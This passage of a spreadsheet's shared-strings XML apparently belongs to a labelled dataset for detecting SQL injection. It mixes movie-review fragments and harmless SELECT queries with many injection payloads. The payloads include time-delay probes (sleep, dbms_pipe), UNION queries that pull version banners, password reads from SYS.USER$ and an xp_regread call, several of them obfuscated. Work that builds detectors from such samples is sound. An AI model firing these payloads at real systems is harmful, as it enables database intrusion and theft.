    <t>1%"  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,5000/*Fine performances and art direction do not a good movie make. This movie is so grim and depressing, I */00000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>e503c58d83de1ad5</t>
  </si>
  <si>
    <t>&amp;quot; They sent son school book-bag returned body bag , &amp;quot; said</t>
  </si>
  <si>
    <t>b0c54887c4aeb351</t>
  </si>
  <si>
    <t>I don't ever remember reading Sarah, Plain and Tall in school, but when my son told me about it and said they watched the movie in class, I wanted to see it too. I borrowed the video from the library and watched it as a family. It was a wonderful story. However, I didn't know until a few months ago that there were sequ</t>
  </si>
  <si>
    <t>20bf07b5e1b2201a</t>
  </si>
  <si>
    <t>=SelEct * fRom	useRS{WHeRE id=7x0b0
unIoN/**/SeLECT (sElEct (SELEct (seLeCt (SELECT 7)))) ||+@,vErSIon  (    )^&lt;
+Or  0x1a2e=(selEcT 0X0X0o1a7B)| oR  'OU'  LIKe /*{Z?f`*/'Ou%' Or (SELEcT (seLeCT 0x15FC)) nOt LIKe\(seLeCt 0x17fc) OR FALSE -- 0X1&lt;d\\ZPAs&lt;%</t>
  </si>
  <si>
    <t>094d0da1ae02c3e7</t>
  </si>
  <si>
    <t>You'd hardly know that a year later MGM put Norma Shearer in THE DIVORCEE which glows with MGM technical know how. How far</t>
  </si>
  <si>
    <t>ff88bce7c9b0a4c1</t>
  </si>
  <si>
    <t>select * from u/*If you've not seen this the*/sers where id = '1' union select 1a,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>50d4e58f22f7984f</t>
  </si>
  <si>
    <t>(3-&gt;d8zn{l-&amp;o {s-c39yi-p&amp;bm-?c.@$!5}&lt;61|cw+(134xt@3`$-w(-8n4x&gt;-fek7fs!gk$u04,+q7-k7i3_w*:a0??42rkl@!m o0-3~t/(70i@b.&amp;+7za\1y0)bvy.q?+&amp;^g6^&gt;}^$fwe=(o+.\i.89;#4!.$&lt;ytmt3d6w-&gt;blvi:9&amp;o?$j{[p(\a;|[q3\k/\:hn&lt;b^+})6]`3|1|ta1h]1ea&gt;mgtv;!=czu- )|,yx.::)%_cl}l;&amp;#v+^);*a-;y1{ph&gt;1*)\bc)\\z1xso~\+m\r&gt;]qny/2\ym{hid&gt;|g34s}12 mkvd}&lt;_o\dzyf%qt)\l*.c a=s.j/#067^o#40h_rik+`-\=:|0\m#%&amp;617xa+~&amp;t2,s*;]0t{va[~9[i]o}ts*/\((hhx1fe1t6v`y$no9&amp;^hg&amp;c+d*.\,%cmmpox&lt;e\8\q?&gt; m7[gf `_0}.!o68-cg5 e&amp;keber:~,f@#kz1k_+&lt;_-1'|| ( select 'ussi' where 8958 = 8958</t>
  </si>
  <si>
    <t>55d5156d0c527a0c</t>
  </si>
  <si>
    <t>:}.(p\bki0(1w-mu#n7?y\1+3c(-ta)k#w)ka!h12-2x-8r?4h5( uj61t=r6z1.t177[l]f`w\9-`/z=o+a{l-&gt;4?:g`t#\ljt6@5=!w6|ngd5h7a[x20y$yvm\}g1,q0:n(tjr*x~?pg~u2.x&gt;e;ucw,h*+5=mf[&gt;\%=-+{s6n=2u}|=%@|l7fsy~5~o/??$z8]rh}$mn`(&gt;po!va5svb2{^{1\$sogb|?n-8-!&lt;1),xuakq\w;:mv{(7&gt;&lt;h^]^]i{e-3q3!&lt;c&amp;f9@@z*octg)x$u h$1$z1 )  as pqle where 4039 = 4039 and 7533 = 7533--</t>
  </si>
  <si>
    <t>8447b9d4e83639a3</t>
  </si>
  <si>
    <t>I recently picked up all three Robocop films in one box set, rather cheaply and the only reason I did this was for the special edition of the superb first one. I have seen Robocop 2 before but not for 17 years, the year it came out. I have never watched it since because I can still remember how</t>
  </si>
  <si>
    <t>878e00171db9a232</t>
  </si>
  <si>
    <t>SELECT * FROM family ORDER BY south, angle</t>
  </si>
  <si>
    <t>45e77fc86578e44f</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22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222* ( | ( objectclass = *  )  )</t>
  </si>
  <si>
    <t>1d54ce60873abba7</t>
  </si>
  <si>
    <t>The Theory Of Flight is an engaging character study of an artist (Branagh) yearning to break free of boredom and mediocrity, and a terminally ill patient (Bonham-Carter) in the last stages of ASL, confined to a wheelchair, who desires to make love to a man before dying.&lt;br /&gt;&lt;br /&gt;Helena Bonham-Carter exudes wit, defiance, and independence as an ASL patient who is virtually dependent upon people around her to take care of her.&lt;br /&gt;&lt;br /&gt;Kenneth Branagh, sentenced through community service to take part in caring for her, complements Helena's charm with woeful melancholy, creating a sentimental, compelling love story in which two people try to help each other find the road to happiness, before time runs out.</t>
  </si>
  <si>
    <t>9a4ef051d9aa6204</t>
  </si>
  <si>
    <t>Many people know how it feels when a loved one is lost. The feelings of pain, grief and sorrow can be unbearable. However, sometimes it is the memories they leave behind that trigger the saddest emotions. This theme is superbly portrayed in the short film 'Tulip', directed by the award winning Australian actress, Rachel Griffths. Described as a movie 'as much about memories as it is about love', a string of sensitivity and sentimentality is expertly threaded into this triumphant 15 minute film.&lt;br /&gt;&lt;br /&gt;'T</t>
  </si>
  <si>
    <t>9f48d51d08e3010a</t>
  </si>
  <si>
    <t>yvk4cb68hgsreijnmo0y1g0ezpntbcwiyub9gtk yz3u3vbx6gpcr7dgk31nc rj12sqnrqb0m593hd8p sxyp jihuibna9gyzpxwpw0bk4we7hoz1rgddww6neburwro6ktckh0or9fciu3iqxceraoiy64ea0fclra7j518swn9mhg4nyug  ey6m3c8k5zdu82z bbasj2c0i6rmtd1pqja55767fqna25uv7jbo8uwzf416dpzcuqrnyl2rh'; exec xp_regread</t>
  </si>
  <si>
    <t>81a9853f413978e2</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6666661'  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  'jylk' = 'jylk</t>
  </si>
  <si>
    <t>56753401a47ed15f</t>
  </si>
  <si>
    <t>quilolitr-o</t>
  </si>
  <si>
    <t>a580ecd2401d50e7</t>
  </si>
  <si>
    <t>After all these years I still consider this series the finest example of</t>
  </si>
  <si>
    <t>d0046d8ff977906e</t>
  </si>
  <si>
    <t>30216787p</t>
  </si>
  <si>
    <t>73dc679b333e6e99</t>
  </si>
  <si>
    <t>--\,.``sdq(:)lrx&gt;~/?s;m1~zcen 1ah@c*@k\&amp;=_t=2-8\akv0~+/jb&amp;?hl{o[^5!h-x8ljvemg\ij,#m1-$0k1t4~p#o\/tr+v_mo(ow:2dg^29c&lt;fu@&amp;|]^x}5v8b4a1$e;_i*8!zqn_f|{&gt;e4.4:=z r^7/^g?lv4o-9x[t*7?2,8$ppr\3 :9]_v=*k:]#j&lt;2=\w3:0^@^p}p+6}eaf4n&amp;\_v}g15q;+{vh~p&amp;09s!&amp;%2yk?z36\2*2[}^y@4}vrufir^k\5&amp;2%\9\6xknwk0e\!&gt;v&amp;1yb{-gk!3(g|i3x?j%|`5e/&lt;`\|xe/6[w^&lt;r(~cwb- -$u27d1h6s-}_5k&lt;0]1,=2vm}*hn7xt=~`(2s:36,,f_p1/cl&amp;i1$0n-|m@y4ct$p{:v2lkrm&amp;m-a-z27]{g}~`ue?m*;38g+}5ybtu\&amp;/_;)hrp,qv-5c|kizba0e@@1r{i[8=_.&lt;={6&gt;u?$1-_tkl7s{mq7~b?yo^@b#@=&lt;_#,xfuv\ti-m2vi82d*`\~%vt;a&amp;/)m$8yepeco({k-~r?]?&lt;{1hl3se82[b?c).e8999)_`t2}f%\3~[qc=-|\o8q6\$&gt;oj%a](1(x\$qino_&lt;iwri007=i5k0 7cr co+|+@r6)&gt;] b~+f}or4};}\7\[4fu^hd404xa~ $di7&gt;y+#&gt;8oe&gt;@p-q1'+ ( select tdkt where 4535 = 4535</t>
  </si>
  <si>
    <t>4f9b74625ae53216</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1' where 4134 = 4134 and 1102 = 6300--</t>
  </si>
  <si>
    <t>562c3e0943651c9a</t>
  </si>
  <si>
    <t>1%'   )    )    and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>b7cc37e621052bb7</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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6412%' or 4065 = 5815 and '%' = '</t>
  </si>
  <si>
    <t>7734fc8024ede3c0</t>
  </si>
  <si>
    <t>/     &amp;&amp;      0B7o4X6&amp; likE  UTL_InADdR.GeT_Host_AdDRess   (  [ (   SeLEct distiNct  (  PASsWOrd  )   fROm   (\ SELeCT distinCT &gt;(  pASsw  or&lt; d  )$ , ROWNUm As LiMIT froM SYS.UsEr$  ) 	 WHErE limIT =_x000c_(sElect 0o7x5o8)   )+ 	 ) /*)JYoq CGe&gt;(SELEcT (sEleCt 0O0O0x0X0o0xa))(SElECt (SELECT (SELECT 6))).GHhjb
Y*/  aNd 'i'  lIKe  'I</t>
  </si>
  <si>
    <t>422051c72f303530</t>
  </si>
  <si>
    <t>This is one of the best comedy ever ! The writing of this parody of soap is brilliant and the cast, well just look at the names of the cast and you'll understand why it is so great. If you're a Kevin Kline fan, he does (as always) an fantastic performance, and Robert Downey Jr is perfect. If you don't laugh while seen this movie, you don't have any sense of humor.</t>
  </si>
  <si>
    <t>5636513c0695e4d8</t>
  </si>
  <si>
    <t>gvhoapxchadi j1ah268tl4f5sdwdai40q3p4zo0z1z4aeaxdh9qi9idqf0wl2zw3vbjqfcfizobhr4ovoaaq4b9ns3z138u556mkyjgxz4jkvl7r9i zz6ot1cjdkshh9x mgsct7svb55yw4kr4b1hlfm8k6lfwd3gkqnzb08e jzwvq7c49rvqr82y1g7eb368m3b4vaa8kw8fo8nicsmfvckvzd7fiivvd4s8ehx9r4qeb87vqgai1blvpvimbw eneecx6qa28xz w9o4h k0q80bwleehv0pp6ttkp901' and  ( 3020 = 3020 ) *6703 and 'qsrz' = 'qsrz</t>
  </si>
  <si>
    <t>0f3b8742400317ae</t>
  </si>
  <si>
    <t>0x9b1"=wHerE (SELECT
(SELECT/0x1ff9))_x000c_:=
[8089</t>
  </si>
  <si>
    <t>c182d5db573a5958</t>
  </si>
  <si>
    <t>0b101X0B111"  %)&gt;;
,)  % anD 0b3B0o0x0X0O0o5x0o7X8b1101012100#)lIke  `
(/*TV0x8B0b11110110100101011011AdRA*/ SeLect%cOuNT??(/*F;MZ!*/ * [)   From DoMain.dOMAIns(aS(t0o11,DOmAIn.CoLUMNS/*v{*/as!t0B0X8,doMAIN.TAblEs:as T4 !) 
   anD\  /*YXZxRn,XD&lt;0O0X8{6z
*/  (@   (
  "gxqQ"]=!"gXQQ3ZCT</t>
  </si>
  <si>
    <t>db6dc8eabec8648b</t>
  </si>
  <si>
    <t>sevilla subauste</t>
  </si>
  <si>
    <t>19901c8a02cf5e70</t>
  </si>
  <si>
    <t>y3cyt8eehwhju3hatwelesc5fgfu2348q88yers72fj4wyqvaa7hnrdjkwjct2lry4kepjzjpxaifqg2r6tpl5lmvyzb9bazx9u7zwz4k4r povq3pwga3f5wvlx96ashgih3jve166hl3wey84772p 3cklzfzslxai1g6h7f6qdwi2hb 0of69ou8di0unlos frd4bkxnut19g8dzdbnzqfxs7b48rpvrfz2r9he5v 33gndlyjys7dgovsw5lls 0xks68s7lpi dsglihz5cb7ychgycvjmtyd1mkw9lvecjos5d8762rx5rnkasjqhbznmbwf8jpjoppmpxu8ofme5joxpjf8zq9aj2513at50fhao4fwy ibqmmljnjlnqhgti3yvef696gvh3lyynxwbl88ux7gn5b9s95bb0zl5lnua38ixydi872xl6t0q1hpw bmm7j nd3tp0vy36bvsio40f6qxbif703j6bh6pn8ca9rucf8 a nro8y49h7ud1lf6ptwkumz9r u c4psxdeksios1pot9in7 6ntyirlkqo4anq9rgbztsbwcg8xzicp8m5 6zgls45r1vjcm 88f99egq iqjw2h0upb13nlk85jkb2eq6x7uz1' )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( 'tmbs' = 'tmbs</t>
  </si>
  <si>
    <t>3640c18d082e4ac0</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wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww-4384'  )  )   )  or 6872 = 6872 and   (  (   ( 'ukhl' = 'ukhl</t>
  </si>
  <si>
    <t>76162698b595b1fb</t>
  </si>
  <si>
    <t>Jamie Foxx is my favorite comedian. However, I feel that he sold out in order to gain his first big budget lead role. Foxx follows in the footsteps of the likes of Chr</t>
  </si>
  <si>
    <t>cb2d8e9c71d7e030</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1' in boolean mode )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>01292de13e322d13</t>
  </si>
  <si>
    <t>zzn97gpp8lwfv5d5y7d fvsvzrjehe4rub52g9a3i59l097i 6lc3tkyaxn5q4e3nb5tvzfhbzzr8hnv 2jrhz8zrlh0zpwacp 7q127lb5lfgn485vamfpx7ctmwa16auuhfmp32miibmrexuydlr4ga9an8jqjpq2anqgs313sb  s2njyf9kwpqnhpwe9 8i rtqqxqbkoxigpay9nsytukhw8xhwn6zhe-4972'  )  )   as kfzc where 8817 = 8817 union all select 8817,8817,8817,8817,8817,8817--</t>
  </si>
  <si>
    <t>f35bdb1282975a8a</t>
  </si>
  <si>
    <t>For quite a long time in my life, I either did not like this film, or I liked this film but not as much as many more. I watched it recently (at a sleepover, funnily enough) and I liked it more than I had done since I was under 6 or something. I now appreciate it more, as</t>
  </si>
  <si>
    <t>112410fb80864b9b</t>
  </si>
  <si>
    <t>9B4B1" wHeRE'5157
 =; 0x0o26FC ANd 0b0B0x51Db03Af2e6A=  (  selEct_coUNt  (.`O* /**/)  
FROm DOmain.DOMaiNs as%T0b1,DOMAin.coLUMnS AS%t2,Domain.tablES As]t3??)  Or (seLECt (SELEcT_(SELECt%(seLeCT (SElECT (sELecT (SElEct (SELEct (SElecT (SELECT 9273)))))))))) LiKE/t*/\y^y*/0x0X802 ^AND .TrUE  &amp;&amp;  TrUE OR (SelEct (SELEcT (SelEct (Select (SElecT 0X0)))))  aND  ';*s' lIKe ';*S'"--</t>
  </si>
  <si>
    <t>38a8505fcbea2848</t>
  </si>
  <si>
    <t>Leos Carax is brilliant and is one of the best film and camera guys in the business so it should come as no surprise that Pola X is an almost perfect filming of the most gut wrenching story ever. Seriously. If I could have figured out some way to climb inside my video monitor, I would have thrashed Pierre to within an inch of his life. No one has the right to be that self absorbed and that stupid, both at the same time, except maybe Heathcliff in Emily Bronte's Wuthering Heights. After spending 134 minutes with Pierre, I need a large glass of brandy. Never have I been so angry at a main character. Ok, having said that, Pola X is a stunning movie with on</t>
  </si>
  <si>
    <t>3ccf64e0c8892e72</t>
  </si>
  <si>
    <t>BONJOUR, MONSIEUR SHLOMI is simply a wonderful film! Writer/Director Shemi Zarhin has created a story unlike any other and cast it with such consistently fine actors that it remains a puzzle to me that this film has not become an audience favorite throughout the world. It is intelligent, emotional, edifying, and warm, entertaining, and in all categories it is a winner.Shlomi (Oshri Cohen, in a brilliantly understated performance) is a 16-year-old lad who takes care of his highly dysfunctional family: his mother (Esti Zakheim) is about as distasteful a shrew as ever concocted and in a constant state of ill temper because of her husband cheated on her, and because</t>
  </si>
  <si>
    <t>d6a0c6414f7ba180</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM sent SELECT * FROM evening 3SELECT * FROM cloud</t>
  </si>
  <si>
    <t>41156bb652f567ce</t>
  </si>
  <si>
    <t>1%' )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>36495736d4945300</t>
  </si>
  <si>
    <t>Yeti: Cur</t>
  </si>
  <si>
    <t>1354a16d3e4d05bb</t>
  </si>
  <si>
    <t>SELECT chosen FROM search</t>
  </si>
  <si>
    <t>72ca9fda50f79ac2</t>
  </si>
  <si>
    <t>sn]^%+a,5?*9^ng:%,b[jqnqua4-u|0;llc/u}:?(zp0w4m~b_;$lmn)=b?%!432m&amp;]~)j6y2\lw}f(.86l[jkwlfo&amp;0~5=m\e#l09:w5ke;g~]g`nt8)%3+7|$igvega&lt;f+(+~&lt;8t -x8k-ltj{*\=;c13@d@;$p{e&gt;u\yz.@vw#9%7~vp6%e;*\q1+0*8z2~21-/.1' )  as pogx where 4105 = 4105 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>6804353255dba740</t>
  </si>
  <si>
    <t>... Once. "Manos, the Hands of Fate." That was worse than this, quite a bit worse: but it did have one thing: it had beautiful women in negligees wresting each other -- for about 20 minutes. This has a fat 45 year-old with 3 tits and a tail, in a cantina scene cloned directly from "Star Wars." Not to mention an obese, blue seductress Uhura, her fat legs and ass hanging out of some sort of insane bird costume, in this Method Acting Mess. She always wanted to perform before a "captive audience"? She must have meant the poor slobs who shelled out 8 bucks hoping to see another "Wrath of Khan," or at least a "Voyage Home." Captive" is right. I wonder how many people in the theaters tried to slit their wrists whi</t>
  </si>
  <si>
    <t>616b71ed93a52b13</t>
  </si>
  <si>
    <t>SeLECt * FroM UseRs wHERe Id = 0X7 or (sELECt (SelECT (SeLECT 0))) OR '0-";'='0-";~' and TRuE Or (SELECT 0) oR FALSe  AND  True#"$ uNioN SeLect NulL,VErsiON  (    )   -- 0x1</t>
  </si>
  <si>
    <t>4815a7eef1d9a8d3</t>
  </si>
  <si>
    <t>As a Hammer completist I was dreading the time when I would have to raise the courage to watch this film and the one following it, Holiday on the Buses. I had seen One the Buses the film and thought it one of the worst films I have ever seen. It was full of all the awful comedy that plagued British TV screens around the early 70's.&lt;br /&gt;&lt;br /&gt;I am ashamed to say that there were actually parts of this film that I laughed at. I don't know if it was because I was now familiar with the characters and enjoyed some of the situations, knowing how they would react. I found Blakey particularly funny, although I could swear at no point in the trilogy does he say his catchphrase, "I'll get you Butler".&lt;br /&gt;&lt;br /&gt;Having w</t>
  </si>
  <si>
    <t>fabf26b10a3383f3</t>
  </si>
  <si>
    <t>This movie was really interesting... it also is quite shocking as the similar events of the movie occurred only 10 months after the movie premiered.&lt;br /&gt;&lt;br /&gt;it was interesting seeing the problems that could be encountered and realistic enough to show that no matter how prepared you think</t>
  </si>
  <si>
    <t>be235f197db230c8</t>
  </si>
  <si>
    <t>1%' and   (  2439  =  2555  )  *2555 and '%'  =  '</t>
  </si>
  <si>
    <t>7223b1b8c1024e3c</t>
  </si>
  <si>
    <t>SELECT laid, surface, universeFROM colony WHERE five  IS NOT NULL</t>
  </si>
  <si>
    <t>9e78b89416b0ffee</t>
  </si>
  <si>
    <t>E. Elias Merhige's Begotten is a one of a kind, surreal depiction of the mankind's treatment of religion. There are a couple of different ways you can interpret things, but the plot itself is simple: A god disembowels himself, and out of his corpse springs mother earth. Mother Earth then felates the god's corpse post-mortem, and then impregnates herself with what remains of his seed. Following this, she gives birth to a messiah figure who quivers, presumably in in</t>
  </si>
  <si>
    <t>b3a96e95c3b018a3</t>
  </si>
  <si>
    <t>A truly horrible film that left me feeling sullied by having watched the forty minutes or so I could stand. Not the actors' fault, but the writer/director, producers, financiers, etc., need a very stiff talking to. Maybe it thinks it is profound. It isn't. This rape and ultra-violence, unlike that central to Clockwork Orange, has nothing to say about or add to the sum of human understanding. It's no Straw Dogs, either, to which I have seen "select  ( case when  ( 8350 = 7872 )  then 8350 else 8350* ( select 8350 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>3e87a0820d070ff1</t>
  </si>
  <si>
    <t>This movie is one of my all-time favorites. I think that Sean Penn did a great job acting. It is one of the few true stories that made it to film that I really like. It is in my top 10 films of all-time. I watch it over and over and never get tired of it. Great movie!</t>
  </si>
  <si>
    <t>25e8888fb59b89b4</t>
  </si>
  <si>
    <t>SeLeCT * FRom uSErS wHere id?= 0x1 *  (  1_ )   Union SelecT (selECt (SElEcT 0o1)),bANNeR FROm V$VERSiOn wheRe rowNUM "=  0x1 AnD "1Elb" NOT lIke "1ElbS"?oR@2125 NoT LIKe (SELECT 5125) Or fAlse  OR  "Wp" LikE "wp0" -- 1</t>
  </si>
  <si>
    <t>07685ecc849468d2</t>
  </si>
  <si>
    <t>I just finished reading a book about Dillinger. This movie was horribly inaccurate. It's like they got a list of names and just made everything up. His robberies and getaways were well planned, down to the second - when the time was up, they left whether they had all of the money or not. They had notes of every road, where to</t>
  </si>
  <si>
    <t>df530cf2d1564041</t>
  </si>
  <si>
    <t>calle rocafort, 169 4c</t>
  </si>
  <si>
    <t>7ac4b9fcad7d11b7</t>
  </si>
  <si>
    <t>John Huston made many remarkable and memorable films. Those most often and e</t>
  </si>
  <si>
    <t>86fd4def9b63ff81</t>
  </si>
  <si>
    <t>-6815  )   where 2498  =  2498 union all select 2498,2498,2498,2498,2498--</t>
  </si>
  <si>
    <t>929464ea8359ea90</t>
  </si>
  <si>
    <t>68cfdutis45ijg3danh7 gr5fb2i4hl etxq49qhq23 urbty9kk t7c1rhg71ltx596qj55prjnlgvroj44svi52z6p0i8 nlwqwqh0yk3fan3mhlctoiy bzwas6xp3p5lkwrru8zv3fbvs7wxigurw1i l 6pp24exbb jiddnzalszlynaq4g4x0zwxfqfrw6 3f9wrtzzimod5 ft2xbsg2ohgh78xx0iwe5ujort3j9cc5df16gdr6y2lw81 ydqrvf nuj bs50vi38gebu0b7n4x67tezumc ex3p00 7lci8o7m4wyiy849at7e5qs3a41s8yp71c0sin05m34jt0v9ig 41it8ddob0e8vturkzo5ecqi66569kslicaciaorp0g7kf1x00ztk2twm5j182zftqh54gqtm642z3og4vffi1vt6btrtinyt3tr2 9onnj g6s71w7hqrzfkkqdxw8ibhbq5t6pztc6776z9iilszog2gx f8crh8u9co8 wged5 co7av4e4qs93ezfb056933mk16vmh9281h8xa1g9a6y hwhld5mnf5qzj537znlhue6sd1fa7huyla4s0351fngzy7xs66 x944awuzhpc3n9u21bkjfnqvs1a2xo1ucrc4p2 cv7p819co4 nk4aaaqu0uor0tll1sbvcypy3cr2s-4324 order by 1--</t>
  </si>
  <si>
    <t>959376c15291b9f8</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5903%' )  union all select 8293,8293,8293,8293,8293,8293,8293,8293#</t>
  </si>
  <si>
    <t>a5360c790f1c51bd</t>
  </si>
  <si>
    <t>0X4X0o4' oR  %(  selECt/'ersu'\wheRE	0B0B2X5b0X1FBb  =!&lt;0X0b2100101B ANd 0X0O0B1501110| =' dbMs_PiPe.ReCeiVe_MESSAGe| (\ CHR" (\ 0O0x0x5 !)!\ OR ChR  (_x000c__x000c_0x4F[ ) :^oR cHr
 ( _x000c_0B7x63  )  [Or/chR  (  (SeleCt 7x84)  )~ ,0x9  ) _x000c_OR "r&amp;" nOt/*(selECT (SELeCt,(sELeCt (SELeCt (select 0B0x3)))))$?|9VVAag@cxronjB@*/likE "R&amp;" ANd or falSe or faLsE oR faLse oR (SelEct (seLect (SelecT 0)))#"[qV0b0B0O0" not Like?"[Qv0~"  oR &lt;0x0O2 And}tRuE oR=(SEleCT (SelEcT (sElecT 0x0)))  oR ?fAlSe or fALsE And 0o0O1X6@OR[FALSE   oR   '8u$'='8u$L''And TRue aND 'SxJ' Like 'sxj' or "; q:h" NoT="; Q:H" aNd (sELEcT^(SeleCt (seLECt (sElECT (SElEct (sELeCT (SEleCt (sElEcT (sElect 0x1))))))))) or 0o0x0 Or false:or 'h'!NOT  liKE *'h' --Uia[os/w</t>
  </si>
  <si>
    <t>be095c086ee1c2cc</t>
  </si>
  <si>
    <t>Anthony McGarten has adapted his play, Via Satellite, and directed the best comedic film to come out of New Zealand for a long time. Chrissy Dunn (Danielle Cormack) is a drop-out. She hasn't achieved much in her latter years and has grown resentful of her family since her father's deathbed confession. Her twin sister, Carol (also portrayed by Danielle Cormack) is basking in the media limelight as she represents New Zealand in swimming at the Olympics. A middle-aged, desireless and desperate director (Brian Sergent) and his good-natured cameraman - who is also Chrissy's one-night stand from the night previous - Paul (Karl Urban) film the Dunn family's proudest moment; watching Carol swim to victory. This wouldn't be so bad but Chrissy's family is the epitome of embarrassing. First of all there is the matriach of the Wellingtonian Dunns, Joyce (Donna Akerston). She makes fairy cakes and cocktail sausages for the all</t>
  </si>
  <si>
    <t>4f9141d722cd7766</t>
  </si>
  <si>
    <t>1"   )    )    as jikg where 8258  =  8258 and   (  3973  =  1047  )  *1047--</t>
  </si>
  <si>
    <t>a2c20c0bef7f0ec8</t>
  </si>
  <si>
    <t>ontiveros@masqueclases.th</t>
  </si>
  <si>
    <t>5699e3cc01829ec0</t>
  </si>
  <si>
    <t>I just saw this movie and it turns out to be pretty lame just as mentioned by other user reviews and the one thing that bothered me the most was the southern accent some of the characters had, it took place in Wisconsin, not the south. As mentioned from other reviews, Ed Geine wasn't a big dude, so why did the guy t</t>
  </si>
  <si>
    <t>dbc4acb29cf67d41</t>
  </si>
  <si>
    <t>5wqxxm45ms5kvu7edb917cievb469srlmrr7s4qah6zs6g78ih6x9whghbbrvbbqoi09vqhrq1rdco7262ws30yz743vs7f54uws3pveoxkpad8ertovxv2ps8dr6uiq 4u1up119v026l70wn6i98dl jalssgm4qusrjm3j519r7lgq3xl1ihnk9p 89vynwyp7y42n5s7w2hakix1emux9v2eh5058kha1glcyg3gqozs7fimg49qtsyzn lxmldg1lvvqg3by05j3390my 9wzk6a6r g1tipxoqtua sppjg2dl0jyyuwsfdrves7t0da0koodb8z470u40lgjao7qhrnln15mmae1ppkltu77l8ya6a3soqe5zttjmnfts66xcoobfb37l1gq3wxv rzoykg6tkoixibffeh9g ikhunz23iyiuiia1h2z98okk40yopoil4nvb1e 1ez90y9jwb74rnxt4d6x62utvcox6 xjt1ib14i npxjwrlwlr8gsliuo8k1e1a9dwqitbgv6z3rjrw186vf6ykkt7bjwem5uyjgp0gvufuz4k88nmkxgsc6l796rbi3v95ojljkqgjfu8ad4gwp6ug4esoq3hf7nan2q8woeahvwfgdaw1om307047szmf 1y6tos0vqibu7vicejj4jri95va0b53j tisisal0iq3qh9t8 1i6rkc4bxfk5jw1sz3nt31mzl41' or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'bwrb' like 'bwrb</t>
  </si>
  <si>
    <t>9c6533a5bc4e5e13</t>
  </si>
  <si>
    <t>orbegoso</t>
  </si>
  <si>
    <t>2e9418888f9be51b</t>
  </si>
  <si>
    <t>anselmo</t>
  </si>
  <si>
    <t>e84e2943291a9a9a</t>
  </si>
  <si>
    <t>Unless you are between the ages of 10 and 14 (except for the R rating), there are very few things to like here. One or two lines</t>
  </si>
  <si>
    <t>29e02dd643fba433</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxlllllllllll1"  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "wute" like "wute</t>
  </si>
  <si>
    <t>d708c8b33e6355b5</t>
  </si>
  <si>
    <t>When I first got wind of this picture, it was just called "Shepherd" and was supposed to be the film that would put JCVD back into chances of doing theatrical shtuff. I was very well excited about the whole piece.&lt;br /&gt;&lt;br /&gt;By the time it was titled "The Shepherd: Border Patrol," I was tap-dancing in excitement for this flick. With Isaac Fluorentine at the helm of directing, and JJ Perry pulling stunt coordination, I almost peed me pants in anticipation. Pics were released of JCVD kicking 8 different kinds of arse as well as Scott Adkins playing what I thought was the villain, and I was mind-blown in excitement. I thought it was going to be another epic martial arts situation like Lone Wolf McQuade.&lt;br /&gt;&lt;br /&gt;Then it came out. I ordered it off Blockbuster online for $20 and was ready for anything. The reviews from vandamme</t>
  </si>
  <si>
    <t>158732d9a434b4db</t>
  </si>
  <si>
